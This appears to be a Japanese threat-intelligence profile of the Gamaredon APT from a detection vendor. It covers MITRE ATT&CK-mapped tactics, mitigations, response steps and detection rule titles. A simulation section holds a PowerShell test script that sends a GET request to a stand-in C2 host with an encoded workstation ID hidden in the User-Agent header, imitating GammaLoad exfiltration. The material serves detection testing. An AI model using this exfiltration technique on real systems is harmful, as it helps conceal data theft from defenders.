Gamaredon(プリミティブ・ベア)APTプロファイル:MITRE ATT&CKマッピングに基づく分析
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Gamaredonは2013年から活動している、ロシアと連携した高度な持続的脅威グループで、ロシアFSBに帰属されています。このグループはサイバースパイ活動とデータ窃取に焦点を当てており、その主なターゲットはウクライナ政府および防衛組織です。彼らの作戦は、GammaLoadやGammaSteelなどのカスタムマルウェアファミリーに基づいており、さまざまな難読化および持続方法によってサポートされています。
調査
このレポートでは、2013年から2025年にわたるキャンペーンをレビューし、グループがCloudflare Workers、Telegram API、およびWinRARの脆弱性の悪用に向けてシフトしたことを強調しています。また、GamaredonはカスタムVBScriptドロッパーから、より高度なPowerShellベースのインフォスティーラーやモバイルスパイウェアへの進展をたどります。
緩和策
推奨される緩和策には、WinRARを修正して CVE-2025-8088 に対処し、不審なPowerShell実行を監視することが含まれます。組織はまた、リムーバブルメディアに対する厳格な管理を施し、異常なスケジュールタスクを確認し、Gamaredonの既知のTTPに対抗するディフェンシブコントロールをシミュレーションおよびテストプラットフォームを使用して検証する必要があります。
対応策
もしGamaredonの活動が検出された場合、特にGammaSteelや Ptero* マルウェア活動の兆候を示すシステムを含め、対応するホストを直ちに隔離するべきです。調査者はレジストリベースの永続性をレビューし、許可されていないエントリについてスケジュールタスクを検査し、CloudflareやTelegram関連のインフラストラクチャへの疑わしいアウトバウンドトラフィックを広く調査する必要があります。
攻撃フロー
検出
PowerShellからの不審な.NETメソッドの呼び出し (via powershell)
表示
持続性のある可能性のあるポイント [ASEPs – Software/NTUSER Hive] (via registry_event)
表示
Rcloneツールによるデータ搾取の可能性 (via cmdline)
表示
PowerShellによるダウンロードまたはアップロード (via cmdline)
表示
PowerShellのコマンドラインからの不審な.NETクラス/メソッドの呼び出し (via process_creation)
表示
Schtasksが不審なディレクトリ/バイナリ/スクリプトを指す (via cmdline)
表示
LOLBAS WScript / CScript (via process_creation)
表示
LOLBAS MSHTAの疑わしい防御回避行動に関する関連するコマンドの検出 (via process_creation)
表示
自動起動位置の不審なバイナリ/スクリプト (via file_event)
表示
可能なCVE-2025-8088 / CVE-2025-6218 (WinRARの脆弱性) の悪用試行 (via file_event)
表示
可能な動的DNSサービスが連絡された (via dns)
表示
User-Agentを利用したGamaredonのGammaLoad GETリクエストの検出 [Windowsネットワーク接続]
表示
LNKショートカットを介したPowerShellダウンローダーと難読化 [Windows PowerShell]
表示
## シミュレーション実行
前提条件: テレメトリ & ベースラインのプリフライトチェックが合格していること。
根拠: このセクションは、検出ルールをトリガーするために設計された敵の技術 (TTP) の正確な実行を詳述しています。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックが期待する正確なテレメトリを生成することを目的としています。抽象的または無関係な例は、誤診につながります。
-
攻撃の概要 & コマンド: 攻撃者が
WORKSTATION01に足場を確立しました。従来のファイルベースのDLPをトリガーせずにシステムメタデータ (ホスト名やユーザー名など) を搾取するために、攻撃者はGammaLoadマルウェアのカスタム実装を使用します。このマルウェアは、リモートのコマンド&コントロール (C2) サーバーへのHTTP GETリクエストを実行します。データをURIやPOSTボディに置く代わりに、マルウェアはエンコードされたワークステーションIDをUser-Agentヘッダーに埋め込みます:::WORKSTATION01_encoded_data。これにより、データはシンプルなURLフィルタリングをバイパスしながら、標準のWebトラフィックに隠されたままになります。 -
回帰テストスクリプト: このスクリプトは、ルールをトリガーするために必要な悪意のあるUser-Agent文字列を使用した特定のHTTP GETリクエストをシミュレートするためにPowerShellを使用します。
# GammaLoad User-Agentエクスフィルトレーションのシミュレーション $TargetUrl = "http://example-c2-server.com/api/check" $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST" Write-Host "[*] シミュレーション開始: 悪意のあるUser-Agentを用いてGETリクエストを送信中..." -ForegroundColor Cyan try { $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET Write-Host "[+] リクエストが正常に送信されました。SIEMでアラートを確認してください。" -ForegroundColor Green } catch { # URLが存在しない場合、コネクションエラーが予期されますが、 # User-Agentはプロキシによってログに記録されるはずです。 Write-Host "[!] リクエストの試行 (注意: URLが無効の場合のコネクションエラーは予期されますが、プロキシログにはUAが記録されるはずです)。" -ForegroundColor Yellow } -
クリーンアップコマンド: このシミュレーションは一時的なネットワークトラフィックのみを生成し、システムファイルやレジストリキーを変更しないため、クリーンアップは必要ありません。
# システムの変更は行われませんでした。 シミュレーション完了。 Write-Host "[*] クリーンアップ: ホストに痕跡は残されていません。" -ForegroundColor Green